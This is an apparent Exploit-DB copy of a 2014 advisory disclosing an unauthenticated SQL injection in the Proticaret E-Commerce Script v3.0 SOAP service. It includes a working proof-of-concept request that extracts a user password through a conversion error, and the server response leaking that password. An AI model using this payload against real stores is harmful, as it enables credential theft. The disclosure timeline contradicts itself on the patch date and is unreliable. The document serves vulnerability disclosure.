Proticaret E-Commerce Script 3.0 - SQL Injection (2)

EDB-ID:

35275




Platform:

XML

Date:

2014-11-17


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection

Release Date:
===========
13 Nov 2014

Product & Service Introduction:
========================
Proticaret is a free e-commerce script.

Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0

Vulnerability Disclosure Timeline:
=========================
20 Oct 2014    :    Contact with Vendor
20 Nov 2014    :    Vendor Response
June 26, 2014 :    Patch Released
13 Nov 2014    :    Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=

Exploitation Technique:
==================
Remote, Unauthenticated


Severity Level:
===========
Critical

Technical Details & Description:
========================
SQL Injection

Proof of Concept (PoC):
==================
Proof of Concept

Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
  <soapenv:Header/>
  <soapenv:Body>
     <tem:GetProductCodes>
        <!--Optional:-->
        <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1-    -</tem:Code>
        <!--Optional:-->
        <tem:StartWith>?</tem:StartWith>
     </tem:GetProductCodes>
  </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
     <soap:Fault>
        <faultcode>soap:Server</faultcode>

<faultstring>System.Web.Services.Protocols.SoapException: Server 
was unable to process request. ---> 
System.Data.SqlClient.SqlException: Conversion failed when converting 
the nvarchar value 'secretpassword' to data type int.
  at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)

at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException 
exception, Boolean breakConnection, Action`1 wrapCloseInAction)
  at

System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject
stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
  at
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, 
SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet
bulkCopyHandler, TdsParserStateObject stateObj, Boolean& 
dataReady)
  at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
  at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
  at System.Data.SqlClient.SqlDataReader.Read()
  at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
  --- End of inner exception stack trace ---</faultstring>
        <detail/>
     </soap:Fault>
  </soap:Body>
</soap:Envelope>


Solution Fix & Patch:
================
Apply the patch for v3.0

Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.

Credits & Authors:
==============
Bilgi Güvenliği Akademisi

Disclaimer & Information:
===================
The
information provided in this advisory is provided as it is without any 
warranty. BGA disclaims all  warranties, either expressed or implied, 
including the warranties of merchantability and capability for a 
particular purpose. BGA or its suppliers are not liable in any case of 
damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages.

Domain:    www.bga.com.tr
Social:        twitter.com/bgasecurity
Contact:    bilgi@bga.com.tr

Copyright © 2014 | BGA